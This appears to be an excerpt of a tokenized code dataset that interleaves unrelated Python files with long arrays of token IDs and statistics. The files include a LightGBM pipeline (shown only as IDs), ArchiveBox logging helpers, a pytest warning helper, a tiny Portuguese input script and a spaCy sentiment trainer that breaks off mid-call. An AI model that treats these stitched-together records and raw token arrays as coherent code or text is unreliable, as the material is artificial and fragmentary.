62, 9288, 62, 64, 13, 14116, 3256, 13639, 28, 14202, 11, 41767, 11639, 59, 83, 11537, 198, 9288, 62, 10247, 13, 28665, 82, 796, 37250, 27112, 3256, 705, 10247, 62, 3672, 3256, 705, 4703, 270, 62, 66, 429, 3256, 705, 4703, 270, 62, 67, 5330, 3256, 705, 929, 62, 11125, 3256, 705, 2902, 62, 11125, 3256, 705, 10247, 62, 4906, 3256, 705, 4475, 20520, 198, 198, 7568, 796, 279, 67, 13, 1102, 9246, 26933, 27432, 11, 1332, 35944, 42503, 62, 9630, 7, 14781, 28, 17821, 8, 198, 7568, 62, 38888, 796, 279, 67, 13, 1102, 9246, 26933, 27432, 62, 38888, 11, 1332, 62, 38888, 35944, 42503, 62, 9630, 7, 14781, 28, 17821, 8, 198, 7568, 62, 82, 907, 796, 279, 67, 13, 1102, 9246, 26933, 27432, 62, 82, 907, 11, 1332, 62, 82, 907, 35944, 42503, 62, 9630, 7, 14781, 28, 17821, 8, 198, 7568, 62, 10247, 796, 279, 67, 13, 1102, 9246, 26933, 27432, 62, 10247, 11, 1332, 62, 10247, 35944, 42503, 62, 9630, 7, 14781, 28, 17821, 8, 628, 198, 29113, 7804, 21017, 27018, 11949, 1303, 29113, 7804, 2235, 628, 198, 79, 17407, 669, 796, 17635, 198, 198, 7568, 11, 4331, 669, 62, 22065, 796, 20121, 62, 27594, 62, 9127, 7, 7568, 11, 47764, 62, 38888, 11, 37250, 27112, 6, 4357, 705, 9127, 62, 22296, 62, 27112, 62, 259, 62, 38888, 24036, 4331, 669, 15853, 4331, 669, 62, 22065, 198, 7568, 11, 4331, 669, 62, 22065, 796, 20121, 62, 27594, 62, 9127, 7, 7568, 11, 47764, 62, 82, 907, 11, 37250, 27112, 6, 4357, 705, 9127, 62, 22296, 62, 27112, 62, 259, 62, 82, 907, 24036, 4331, 669, 15853, 4331, 669, 62, 22065, 198, 7568, 11, 4331, 669, 62, 22065, 796, 20121, 62, 27594, 62, 9127, 7, 7568, 11, 47764, 62, 10247, 11, 37250, 27112, 6, 4357, 705, 9127, 62, 22296, 62, 27112, 62, 259, 62, 10247, 24036, 4331, 669, 15853, 4331, 669, 62, 22065, 198, 198, 7568, 11, 4331, 669, 62, 22065, 796, 20121, 62, 27594, 62, 505, 8940, 62, 9127, 7, 7568, 11, 47764, 62, 38888, 11, 37250, 27112, 3256, 705, 10365, 62, 11925, 6, 4357, 705, 38888, 62, 10365, 62, 11925, 24036, 4331, 669, 15853, 4331, 669, 62, 22065, 198, 7568, 11, 4331, 669, 62, 22065, 796, 20121, 62, 27594, 62, 505, 8940, 62, 9127, 7, 7568, 11, 47764, 62, 38888, 11, 37250, 27112, 3256, 705, 13345, 62, 4906, 6, 4357, 705, 38888, 62, 13345, 62, 4906, 24036, 4331, 669, 15853, 4331, 669, 62, 22065, 198, 7568, 11, 4331, 669, 62, 22065, 796, 20121, 62, 27594, 62, 505, 8940, 62, 9127, 7, 7568, 11, 47764, 62, 38888, 11, 37250, 27112, 3256, 705, 259, 62, 448, 6, 4357, 705, 38888, 62, 259, 62, 448, 62, 24036, 4331, 669, 15853, 4331, 669, 62, 22065, 198, 7568, 11, 4331, 669, 62, 22065, 796, 20121, 62, 27594, 62, 505, 8940, 62, 9127, 7, 7568, 11, 47764, 62, 82, 907, 11, 37250, 27112, 3256, 705, 10365, 62, 11925, 6, 4357, 705, 82, 907, 62, 10365, 62, 11925, 24036, 4331, 669, 15853, 4331, 669, 62, 22065, 198, 7568, 11, 4331, 669, 62, 22065, 796, 20121, 62, 27594, 62, 505, 8940, 62, 9127, 7, 7568, 11, 47764, 62, 82, 907, 11, 37250, 27112, 3256, 705, 259, 62, 448, 6, 4357, 705, 82, 907, 62, 259, 62, 448, 24036, 4331, 669, 15853, 4331, 669, 62, 22065, 198, 7568, 11, 4331, 669, 62, 22065, 796, 20121, 62, 27594, 62, 505, 8940, 62, 9127, 7, 7568, 11, 47764, 62, 10247, 11, 37250, 27112, 3256, 705, 10247, 62, 4906, 6, 4357, 705, 10247, 62, 4906, 24036, 4331, 669, 15853, 4331, 669, 62, 22065, 198, 7568, 11, 4331, 669, 62, 22065, 796, 20121, 62, 27594, 62, 505, 8940, 62, 9127, 7, 7568, 11, 47764, 62, 10247, 11, 37250, 27112, 3256, 705, 4475, 6, 4357, 705, 10247, 62, 4475, 24036, 4331, 669, 15853, 4331, 669, 62, 22065, 198, 198, 7568, 11, 4331, 669, 62, 22065, 796, 20121, 62, 27594, 62, 77, 34642, 7, 7568, 11, 47764, 62, 38888, 11, 37250, 27112, 6, 4357, 705, 10365, 62, 22510, 3256, 705, 77, 34642, 62, 10365, 33111, 62, 22296, 62, 27112, 62, 259, 62, 38888, 24036, 4331, 669, 15853, 4331, 669, 62, 22065, 198, 7568, 11, 4331, 669, 62, 22065, 796, 20121, 62, 27594, 62, 77, 34642, 7, 7568, 11, 47764, 62, 38888, 11, 37250, 27112, 6, 4357, 705, 10365, 62, 2256, 3256, 705, 77, 34642, 62, 10365, 13847, 62, 22296, 62, 27112, 62, 259, 62, 38888, 24036, 4331, 669, 15853, 4331, 669, 62, 22065, 198, 7568, 11, 4331, 669, 62, 22065, 796, 20121, 62, 27594, 62, 77, 34642, 7, 7568, 11, 47764, 62, 82, 907, 11, 37250, 27112, 6, 4357, 705, 10365, 62, 22510, 3256, 705, 77, 34642, 62, 10365, 33111, 62, 22296, 62, 27112, 62, 259, 62, 82, 907, 24036, 4331, 669, 15853, 4331, 669, 62, 22065, 198, 7568, 11, 4331, 669, 62, 22065, 796, 20121, 62, 27594, 62, 77, 34642, 7, 7568, 11, 47764, 62, 82, 907, 11, 37250, 27112, 6, 4357, 705, 10365, 62, 2256, 3256, 705, 77, 34642, 62, 10365, 13847, 62, 22296, 62, 27112, 62, 259, 62, 82, 907, 24036, 4331, 669, 15853, 4331, 669, 62, 22065, 198, 7568, 11, 4331, 669, 62, 22065, 796, 20121, 62, 27594, 62, 77, 34642, 7, 7568, 11, 47764, 62, 10247, 11, 37250, 27112, 6, 4357, 705, 10247, 62, 3672, 3256, 705, 77, 34642, 62, 10247, 5376, 62, 22296, 62, 27112, 62, 259, 62, 10247, 24036, 4331, 669, 15853, 4331, 669, 62, 22065, 198, 198, 4033, 62, 4868, 796, 37250, 4703, 270, 62, 66, 429, 3256, 705, 4703, 270, 62, 67, 5330, 3256, 705, 929, 62, 11125, 3256, 705, 2902, 62, 11125, 20520, 198, 1640, 1312, 287, 951, 62, 4868, 25, 198, 220, 220, 220, 47764, 11, 4331, 669, 62, 22065, 796, 20121, 62, 27594, 62, 1084, 7, 7568, 11, 47764, 62, 10247, 11, 37250, 27112, 6, 4357, 1312, 11, 705, 1084, 62, 4, 82, 62, 22296, 62, 27112, 62, 259, 62, 10247, 6, 4064, 1312, 1776, 4331, 669, 15853, 4331, 669, 62, 22065, 198, 220, 220, 220, 47764, 11, 4331, 669, 62, 22065, 796, 20121, 62, 27594, 62, 9806, 7, 7568, 11, 47764, 62, 10247, 11, 37250, 27112, 6, 4357, 1312, 11, 705, 9806, 62, 4, 82, 62, 22296, 62, 27112, 62, 259, 62, 10247, 6, 4064, 1312, 1776, 4331, 669, 15853, 4331, 669, 62, 22065, 198, 220, 220, 220, 47764, 11, 4331, 669, 62, 22065, 796, 20121, 62, 27594, 62, 32604, 7, 7568, 11, 47764, 62, 10247, 11, 37250, 27112, 6, 4357, 1312, 11, 705, 32604, 62, 4, 82, 62, 22296, 62, 27112, 62, 259, 62, 10247, 6, 4064, 1312, 1776, 4331, 669, 15853, 4331, 669, 62, 22065, 198, 198, 27432, 62, 87, 796, 47764, 13, 17946, 58, 37498, 27432, 62, 11925, 532, 352, 828, 4331, 669, 60, 198, 27432, 62, 88, 796, 47764, 13, 17946, 58, 37498, 27432, 62, 11925, 532, 352, 828, 2496, 60, 198, 9288, 62, 87, 796, 47764, 13, 17946, 58, 27432, 62, 11925, 45299, 4331, 669, 60, 628, 198, 29113, 7804, 21017, 4401, 4579, 44, 1303, 29113, 7804, 2235, 628, 198, 11250, 62, 75, 22296, 796, 1391, 198, 220, 220, 220, 705, 744, 82, 10354, 33028, 11, 198, 220, 220, 220, 705, 69, 10119, 10354, 642, 198, 92, 198, 198, 37266, 62, 75, 22296, 796, 1391, 198, 220, 220, 220, 705, 39521, 278, 62, 4906, 10354, 705, 70, 17457, 83, 3256, 198, 220, 220, 220, 705, 15252, 425, 10354, 705, 39491, 3256, 198, 220, 220, 220, 705, 4164, 1173, 10354, 1391, 6, 14272, 6, 5512, 198, 220, 220, 220, 705, 22510, 62, 293, 3080, 10354, 8093, 11, 198, 220, 220, 220, 705, 40684, 62, 4873, 10354, 657, 13, 3312, 11, 198, 220, 220, 220, 705, 30053, 62, 69, 7861, 10354, 657, 13, 23, 11, 198, 220, 220, 220, 705, 65, 16406, 62, 69, 7861, 10354, 657, 13, 23, 11, 198, 220, 220, 220, 705, 65, 16406, 62, 19503, 80, 10354, 352, 11, 198, 220, 220, 220, 1303, 705, 1084, 62, 16345, 62, 33979, 666, 62, 259, 62, 33201, 10354, 838, 11, 198, 220, 220, 220, 705, 19011, 16579, 10354, 642, 11, 198, 220, 220, 220, 705, 22510, 62, 16663, 82, 10354, 42804, 62, 9127, 3419, 532, 352, 11, 198, 220, 220, 220, 705, 28826, 10354, 767, 11, 198, 92, 198, 198, 2, 300, 22296, 62, 33967, 7, 27432, 62, 87, 11, 4512, 62, 88, 11, 42287, 62, 75, 22296, 11, 4566, 62, 75, 22296, 17816, 744, 82, 6, 4357, 4566, 62, 75, 22296, 17816, 69, 10119, 6, 12962, 198, 198, 19849, 62, 75, 22296, 11, 2747, 62, 75, 22296, 796, 300, 22296, 62, 27432, 62, 79, 17407, 7, 27432, 62, 87, 11, 4512, 62, 88, 11, 1332, 62, 87, 11, 42287, 62, 75, 22296, 11, 4101, 8, 198, 198, 20274, 796, 3650, 62, 20274, 7, 9288, 13, 27112, 11, 2747, 62, 75, 22296, 11, 11387, 11, 705, 1264, 28256, 1954, 12, 75, 22296, 12, 4, 67, 12, 4, 67, 7, 81, 4, 67, 33047, 4064, 357, 3324, 3682, 11, 860, 2931, 23, 11, 4101, 4008, 198, 20274, 796, 3650, 62, 20274, 7, 9288, 13, 27112, 11, 2747, 62, 75, 22296, 11, 11387, 11, 705, 7266, 3411, 11537, 198, 198, 11011, 796, 279, 67, 13, 6601, 19778, 15090, 6, 30053, 10354, 27432, 62, 87, 13, 28665, 82, 13, 27160, 11, 705, 11748, 590, 10354, 4868, 7, 19849, 62, 75, 22296, 13, 30053, 62, 11748, 590, 28955, 30072, 198, 11011, 796, 848, 13, 30619, 62, 27160, 7, 1525, 796, 705, 11748, 590, 3256, 41988, 796, 10352, 8, 198, 11011, 13, 1462, 62, 40664, 7, 13252, 2394, 62, 34219, 1343, 705, 7890, 14, 22915, 14, 27594, 62, 11011, 14, 11011, 12, 1264, 28256, 1954, 12, 4, 67, 12, 4, 67, 7, 81, 4, 67, 737, 40664, 6, 4064, 357, 3324, 405, 11, 860, 15377, 11, 4101, 828, 6376, 28, 25101, 8, 198 ]
2.55308
2,289
import sys from datetime import datetime from config import ANSI, REPO_DIR, OUTPUT_DIR # globals are bad, mmkay _LAST_RUN_STATS = { 'skipped': 0, 'succeeded': 0, 'failed': 0, 'parsing_start_ts': 0, 'parsing_end_ts': 0, 'indexing_start_ts': 0, 'indexing_end_ts': 0, 'archiving_start_ts': 0, 'archiving_end_ts': 0, 'links': {}, } def pretty_path(path): """convert paths like .../ArchiveBox/archivebox/../output/abc into output/abc""" return path.replace(REPO_DIR + '/', '') ### Parsing Stage ### Indexing Stage ### Archiving Stage def log_archive_method_finished(result): """quote the argument with whitespace in a command so the user can copy-paste the outputted string directly to run the cmd """ required_keys = ('cmd', 'pwd', 'output', 'status', 'start_ts', 'end_ts') assert ( isinstance(result, dict) and all(key in result for key in required_keys) and ('output' in result) ), 'Archive method did not return a valid result.' # Prettify CMD string and make it safe to copy-paste by quoting arguments quoted_cmd = ' '.join( '"{}"'.format(arg) if ' ' in arg else arg for arg in result['cmd'] ) if result['status'] == 'failed': # Prettify error output hints string and limit to five lines hints = getattr(result['output'], 'hints', None) or () if hints: hints = hints if isinstance(hints, (list, tuple)) else hints.split('\n') hints = ( ' {}{}{}'.format(ANSI['lightyellow'], line.strip(), ANSI['reset']) for line in hints[:5] if line.strip() ) # Collect and prefix output lines with indentation output_lines = [ '{}Failed:{} {}{}'.format( ANSI['red'], result['output'].__class__.__name__.replace('ArchiveError', ''), result['output'], ANSI['reset'] ), *hints, '{}Run to see full output:{}'.format(ANSI['lightred'], ANSI['reset']), ' cd {};'.format(result['pwd']), ' {}'.format(quoted_cmd), ] print('\n'.join( ' {}'.format(line) for line in output_lines if line ))
[ 11748, 25064, 198, 6738, 4818, 8079, 1330, 4818, 8079, 198, 6738, 4566, 1330, 3537, 11584, 11, 4526, 16402, 62, 34720, 11, 16289, 30076, 62, 34720, 628, 198, 2, 15095, 874, 389, 2089, 11, 8085, 5568, 198, 62, 43, 11262, 62, 49, 4944, 62, 2257, 33586, 796, 1391, 198, 220, 220, 220, 705, 8135, 3949, 10354, 657, 11, 198, 220, 220, 220, 705, 82, 1229, 2707, 276, 10354, 657, 11, 198, 220, 220, 220, 705, 47904, 10354, 657, 11, 628, 220, 220, 220, 705, 79, 945, 278, 62, 9688, 62, 912, 10354, 657, 11, 198, 220, 220, 220, 705, 79, 945, 278, 62, 437, 62, 912, 10354, 657, 11, 628, 220, 220, 220, 705, 9630, 278, 62, 9688, 62, 912, 10354, 657, 11, 198, 220, 220, 220, 705, 9630, 278, 62, 437, 62, 912, 10354, 657, 11, 628, 220, 220, 220, 705, 998, 1412, 62, 9688, 62, 912, 10354, 657, 11, 198, 220, 220, 220, 705, 998, 1412, 62, 437, 62, 912, 10354, 657, 11, 628, 220, 220, 220, 705, 28751, 10354, 1391, 5512, 198, 92, 198, 198, 4299, 2495, 62, 6978, 7, 6978, 2599, 198, 220, 220, 220, 37227, 1102, 1851, 13532, 588, 2644, 14, 19895, 425, 14253, 14, 17474, 3524, 14, 40720, 22915, 14, 39305, 656, 5072, 14, 39305, 37811, 198, 220, 220, 220, 1441, 3108, 13, 33491, 7, 2200, 16402, 62, 34720, 1343, 31051, 3256, 10148, 8, 628, 198, 21017, 23042, 278, 15371, 628, 198, 21017, 12901, 278, 15371, 628, 198, 21017, 5579, 1412, 15371, 628, 198, 198, 4299, 2604, 62, 17474, 62, 24396, 62, 43952, 7, 20274, 2599, 198, 220, 220, 220, 37227, 22708, 262, 4578, 351, 13216, 10223, 287, 257, 3141, 523, 262, 2836, 460, 220, 198, 220, 220, 220, 220, 220, 220, 4866, 12, 34274, 262, 5072, 1513, 4731, 3264, 284, 1057, 262, 23991, 198, 220, 220, 220, 37227, 198, 220, 220, 220, 2672, 62, 13083, 796, 19203, 28758, 3256, 705, 79, 16993, 3256, 705, 22915, 3256, 705, 13376, 3256, 705, 9688, 62, 912, 3256, 705, 437, 62, 912, 11537, 198, 220, 220, 220, 6818, 357, 198, 220, 220, 220, 220, 220, 220, 220, 318, 39098, 7, 20274, 11, 8633, 8, 198, 220, 220, 220, 220, 220, 220, 220, 290, 477, 7, 2539, 287, 1255, 329, 1994, 287, 2672, 62, 13083, 8, 198, 220, 220, 220, 220, 220, 220, 220, 290, 19203, 22915, 6, 287, 1255, 8, 198, 220, 220, 220, 10612, 705, 19895, 425, 2446, 750, 407, 1441, 257, 4938, 1255, 2637, 628, 220, 220, 220, 1303, 3771, 926, 1958, 327, 12740, 4731, 290, 787, 340, 3338, 284, 4866, 12, 34274, 416, 28411, 7159, 198, 220, 220, 220, 10947, 62, 28758, 796, 705, 45302, 22179, 7, 198, 220, 220, 220, 220, 220, 220, 220, 705, 1, 90, 36786, 4458, 18982, 7, 853, 8, 611, 705, 705, 287, 1822, 2073, 1822, 198, 220, 220, 220, 220, 220, 220, 220, 329, 1822, 287, 1255, 17816, 28758, 20520, 198, 220, 220, 220, 1267, 628, 220, 220, 220, 611, 1255, 17816, 13376, 20520, 6624, 705, 47904, 10354, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 3771, 926, 1958, 4049, 5072, 20269, 4731, 290, 4179, 284, 1936, 3951, 198, 220, 220, 220, 220, 220, 220, 220, 20269, 796, 651, 35226, 7, 20274, 17816, 22915, 6, 4357, 705, 71, 29503, 3256, 6045, 8, 393, 7499, 198, 220, 220, 220, 220, 220, 220, 220, 611, 20269, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 20269, 796, 20269, 611, 318, 39098, 7, 71, 29503, 11, 357, 4868, 11, 46545, 4008, 2073, 20269, 13, 35312, 10786, 59, 77, 11537, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 20269, 796, 357, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 705, 220, 220, 220, 1391, 18477, 18477, 92, 4458, 18982, 7, 1565, 11584, 17816, 2971, 36022, 6, 4357, 1627, 13, 36311, 22784, 3537, 11584, 17816, 42503, 6, 12962, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 329, 1627, 287, 20269, 58, 25, 20, 60, 611, 1627, 13, 36311, 3419, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1267, 628, 220, 220, 220, 220, 220, 220, 220, 1303, 9745, 290, 21231, 5072, 3951, 351, 33793, 341, 198, 220, 220, 220, 220, 220, 220, 220, 5072, 62, 6615, 796, 685, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 705, 90, 92, 37, 6255, 29164, 92, 1391, 18477, 92, 4458, 18982, 7, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 3537, 11584, 17816, 445, 6, 4357, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1255, 17816, 22915, 6, 4083, 834, 4871, 834, 13, 834, 3672, 834, 13, 33491, 10786, 19895, 425, 12331, 3256, 10148, 828, 220, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1255, 17816, 22915, 6, 4357, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 3537, 11584, 17816, 42503, 20520, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 10612, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1635, 71, 29503, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 705, 90, 92, 10987, 284, 766, 1336, 5072, 29164, 92, 4458, 18982, 7, 1565, 11584, 17816, 2971, 445, 6, 4357, 3537, 11584, 17816, 42503, 20520, 828, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 705, 220, 220, 220, 22927, 1391, 19629, 4458, 18982, 7, 20274, 17816, 79, 16993, 20520, 828, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 705, 220, 220, 220, 23884, 4458, 18982, 7, 421, 5191, 62, 28758, 828, 198, 220, 220, 220, 220, 220, 220, 220, 2361, 198, 220, 220, 220, 220, 220, 220, 220, 3601, 10786, 59, 77, 4458, 22179, 7, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 705, 220, 220, 220, 220, 220, 220, 220, 23884, 4458, 18982, 7, 1370, 8, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 329, 1627, 287, 5072, 62, 6615, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 611, 1627, 198, 220, 220, 220, 220, 220, 220, 220, 15306, 198 ]
2.198682
1,062
from typing import Hashable, List, Tuple, Mapping import contextlib import pytest import numpy as np import joblib import xarray import io @contextlib.contextmanager def no_warning(*args): """Raise error if any errors occur. Takes the same arguments as ``pytest.warns``. Example: >>> import warnings >>> from vcm.testing import no_warning >>> with no_warning(UserWarning): ... warnings.warn(UserWarning("A warning")) ... Traceback (most recent call last): File "<ipython-input-9-c178a20fa539>", line 2, in <module> warnings.warn(UserWarning("A warning")) File "/Users/noah/.pyenv/versions/miniconda3-latest/envs/fv3net/lib/python3.7/contextlib.py", line 119, in __exit__ next(self.gen) File "/Users/noah/workspace/fv3net/external/vcm/vcm/testing.py", line 14, in no_warning assert len(record) == 0 AssertionError """ # noqa with pytest.warns(*args) as record: yield assert len(record) == 0 def checksum_dataarray_mapping( d: Mapping[Hashable, xarray.DataArray] ) -> List[Tuple[Hashable, str]]: """Checksum a mapping of datarrays Returns: sorted list of (key, hash) combinations. This is sorted to simplify regression testing. """ sorted_keys = sorted(d.keys()) return [(key, checksum_dataarray(d[key])) for key in sorted_keys]
[ 6738, 19720, 1330, 21059, 540, 11, 7343, 11, 309, 29291, 11, 337, 5912, 198, 11748, 4732, 8019, 198, 11748, 12972, 9288, 198, 11748, 299, 32152, 355, 45941, 198, 11748, 1693, 8019, 198, 11748, 2124, 18747, 198, 198, 11748, 33245, 628, 198, 31, 22866, 8019, 13, 22866, 37153, 198, 4299, 645, 62, 43917, 46491, 22046, 2599, 198, 220, 220, 220, 37227, 21762, 786, 4049, 611, 597, 8563, 3051, 13, 33687, 262, 976, 7159, 355, 198, 220, 220, 220, 7559, 9078, 9288, 13, 40539, 82, 15506, 13, 628, 220, 220, 220, 17934, 25, 628, 220, 220, 220, 220, 220, 220, 220, 13163, 1330, 14601, 198, 220, 220, 220, 220, 220, 220, 220, 13163, 422, 410, 11215, 13, 33407, 1330, 645, 62, 43917, 198, 220, 220, 220, 220, 220, 220, 220, 13163, 351, 645, 62, 43917, 7, 12982, 20361, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 2644, 220, 220, 220, 220, 14601, 13, 40539, 7, 12982, 20361, 7203, 32, 6509, 48774, 198, 220, 220, 220, 220, 220, 220, 220, 2644, 198, 220, 220, 220, 220, 220, 220, 220, 34912, 1891, 357, 1712, 2274, 869, 938, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 9220, 33490, 541, 7535, 12, 15414, 12, 24, 12, 66, 23188, 64, 1238, 13331, 20, 2670, 29, 1600, 1627, 362, 11, 287, 1279, 21412, 29, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 14601, 13, 40539, 7, 12982, 20361, 7203, 32, 6509, 48774, 198, 220, 220, 220, 220, 220, 220, 220, 9220, 12813, 14490, 14, 3919, 993, 11757, 9078, 24330, 14, 47178, 14, 1084, 291, 13533, 18, 12, 42861, 14, 268, 14259, 14, 69, 85, 18, 3262, 14, 8019, 14, 29412, 18, 13, 22, 14, 22866, 8019, 13, 9078, 1600, 1627, 15136, 11, 287, 11593, 37023, 834, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1306, 7, 944, 13, 5235, 8, 198, 220, 220, 220, 220, 220, 220, 220, 9220, 12813, 14490, 14, 3919, 993, 14, 5225, 10223, 14, 69, 85, 18, 3262, 14, 22615, 14, 85, 11215, 14, 85, 11215, 14, 33407, 13, 9078, 1600, 1627, 1478, 11, 287, 645, 62, 43917, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 6818, 18896, 7, 22105, 8, 6624, 657, 198, 220, 220, 220, 220, 220, 220, 220, 2195, 861, 295, 12331, 628, 220, 220, 220, 37227, 220, 1303, 645, 20402, 198, 220, 220, 220, 351, 12972, 9288, 13, 40539, 82, 46491, 22046, 8, 355, 1700, 25, 198, 220, 220, 220, 220, 220, 220, 220, 7800, 628, 220, 220, 220, 6818, 18896, 7, 22105, 8, 6624, 657, 628, 198, 198, 4299, 8794, 388, 62, 7890, 18747, 62, 76, 5912, 7, 198, 220, 220, 220, 288, 25, 337, 5912, 58, 26257, 540, 11, 2124, 18747, 13, 6601, 19182, 60, 198, 8, 4613, 7343, 58, 51, 29291, 58, 26257, 540, 11, 965, 60, 5974, 198, 220, 220, 220, 37227, 7376, 4657, 388, 257, 16855, 286, 4818, 3258, 592, 628, 220, 220, 220, 16409, 25, 198, 220, 220, 220, 220, 220, 220, 220, 23243, 1351, 286, 357, 2539, 11, 12234, 8, 17790, 13, 770, 318, 23243, 284, 30276, 198, 220, 220, 220, 220, 220, 220, 220, 20683, 4856, 13, 628, 220, 220, 220, 37227, 198, 220, 220, 220, 23243, 62, 13083, 796, 23243, 7, 67, 13, 13083, 28955, 198, 220, 220, 220, 1441, 47527, 2539, 11, 8794, 388, 62, 7890, 18747, 7, 67, 58, 2539, 60, 4008, 329, 1994, 287, 23243, 62, 13083, 60, 628 ]
2.492174
575
nome=input("Digite seu nome:") idade=int(input("Digite sua idade:")) sexo=input("Digite seu sexo [m/f]:") tupla=(nome,idade,sexo) print(tupla)
[ 77, 462, 28, 15414, 7203, 19511, 578, 384, 84, 299, 462, 25, 4943, 198, 312, 671, 28, 600, 7, 15414, 7203, 19511, 578, 424, 64, 4686, 671, 11097, 4008, 198, 8044, 78, 28, 15414, 7203, 19511, 578, 384, 84, 1714, 78, 685, 76, 14, 69, 5974, 4943, 198, 28047, 489, 64, 16193, 77, 462, 11, 312, 671, 11, 8044, 78, 8, 198, 4798, 7, 28047, 489, 64, 8 ]
2.088235
68
"""Structure for model trainer loosely taken from https://realpython.com/sentiment-analysis-python mainly for guide on spacy. dataset used is from https://ai.stanford.edu/~amaas/data/sentiment/ using version 2.3.5 of spacy as version 3 includes api issues when trying to use en cor web sm """ import os from random import shuffle import numpy as np import spacy import pickle from spacy.util import minibatch, compounding from spacy.tokenizer import Tokenizer from spacy.pipeline import Morphologizer import csv def format_training_data(direc: str = "data/training/aclImdb/train") -> None: """ Loads the training data from file_directory and stores the data into a pickle file Do not run if you have not downloaded and extracted the files from the downloadable tar.gz """ reviews = [] # we have a folder of positive reviews and negative reviews so well do two iterations for cat in ('pos', 'neg'): # grabs each individual review (each review is stored in its own text file) for review_direc in filter(lambda j: j[-4:]=='.txt', os.listdir(f'{direc}/{cat}')): with open(f'{direc}/{cat}/{review_direc}', encoding="Latin-1") as f: #cleans the text and cattegorizes it reviews.append((f.read().replace('<br />', r'\n\n').strip(), {'cats':{'pos':'pos'==cat,'neg':'neg'==cat}})) with open('data/training/movie_reviews_data.pkl', 'wb') as f: pickle.dump(reviews, f) def shuffle_training_data(data: list, split: int = .8) -> tuple[list]: """ shuffles the data and separates it by split in order to have a training dataset and a testing dataset. Default is a 4:1 split as recommended """ shuffle(data) return data[int(len(data)*split):], data[:int(len(data)*split)] def grab_training_data(shuffle: bool = False, direc: str = 'data/training/movie_reviews_data.pkl') -> tuple[list]: """ Opens the reviews stored in the pickle file. If shuffle is true that means that we should get the data ready by running shuffle_training_Data """ with open(direc, 'rb') as f: reviews = pickle.load(f) return shuffle_training_data(reviews) if shuffle else tuple(reviews) def save_model(nlp, optimizer, training_data, test_data, directory: str= 'models/sentiment/model_artifacts') -> None: """saves the given model""" with nlp.use_params(optimizer.averages): nlp.to_disk(directory) print(f"Model Saved to {directory}") def train_model(training_data: list[tuple], test_data: list[tuple], count: int): """ Trains model given training data. Code structure taken from https://realpython.com/sentiment-analysis-python Changes were made due to some efficiency issues, unclear code, and outdated uses of APIs and libraries """ results_txt = [] nlp = spacy.load("en_core_web_sm") # for en_core_web_sm legacy issue, pip3 install: # https://github.com/explosion/spacy-models/releases/download/en_core_web_sm-2.2.0/en_core_web_sm-2.2.0.tar.gz # morphologizer documentation: https://spacy.io/api/morphologizer#add_label if "textcat" not in nlp.pipe_names: nlp.add_pipe(nlp.create_pipe("textcat", config={"architecture": "simple_cnn"}), last=True) textcat = nlp.get_pipe("textcat") textcat.add_label("pos") textcat.add_label("neg") with open('models/sentiment/models/test_data.pkl', 'wb') as f: pickle.dump(test_data, f) # code to exclude useless pipes from training with nlp.disable_pipes([pipe for pipe in nlp.pipe_names if pipe!="textcat"]): optimizer = nlp.begin_training() batch_sizes = compounding(4.0, 32.0, 1.001) for i in range(count): shuffle(training_data) batches, loss = minibatch(training_data, size = batch_sizes), {} for batch in batches: text, labels = zip(*batch) # batch is in the form [(text,label)] so we zip* and get a list for each nlp.update(text, labels, drop=.2, sgd=optimizer, losses = loss) with textcat.model.use_params(optimizer.averages): results = evaluate_model(nlp.tokenizer, textcat, test_data) txt_wrp = f'Model #{i+1}/{count}: Precision: {results["precision"]}, Recall: {results["recall"]}, F-Score: {results["f-score"]}, loss:{loss["textcat"]}.' print(txt_wrp,end=' ') results_txt.append(txt_wrp) write_data_to_csv(results, loss, i) # uncomment to save model "BE CAREFUL MAY DESTROY PREVIOUS MODEL" save_model(nlp, optimizer, training_data, test_data, f'models/sentiment/models/model{i+1}') with open('models/sentiment/results.txt', 'w') as f: for result in results_txt: f.write(result+'\n') def evaluate_model(tokenizer: Tokenizer, textcat: Morphologizer, test_data: list) -> dict: """ evaluate the model to see if it is worthwhile to save the model """ true_positives = true_negatives = 0 false_positives = false_negatives = 1e-8 # near 0 to avoid /0 $$ textcat.pipe(tokenizer(x[0])).cats['pos'], tokens, labels = zip(*map(lambda x: (tokenizer(x[0]), x[1]['cats']), test_data)) for score, true_label in zip([i.cats['pos'] for i in textcat.pipe(tokens)], labels): if score >= 0.5 and true_label["pos"]: true_positives += 1 elif score >= 0.5 and true_label["neg"]: false_positives += 1 elif score < 0.5 and true_label["neg"]: true_negatives += 1 elif score < 0.5 and true_label["pos"]: false_negatives += 1 precision = true_positives / (true_positives + false_positives) recall = true_positives / (true_positives + false_negatives) f_score = 2 * (precision * recall) / (precision + recall) if precision + recall else 0 return {"precision": precision, "recall": recall, "f-score": f_score} if __name__ == "__main__": # Uncomment to retrain models # DISCLAIMER: takes hours and overwrites other files data = grab_training_data(True) # train_model(data[0], data[1], 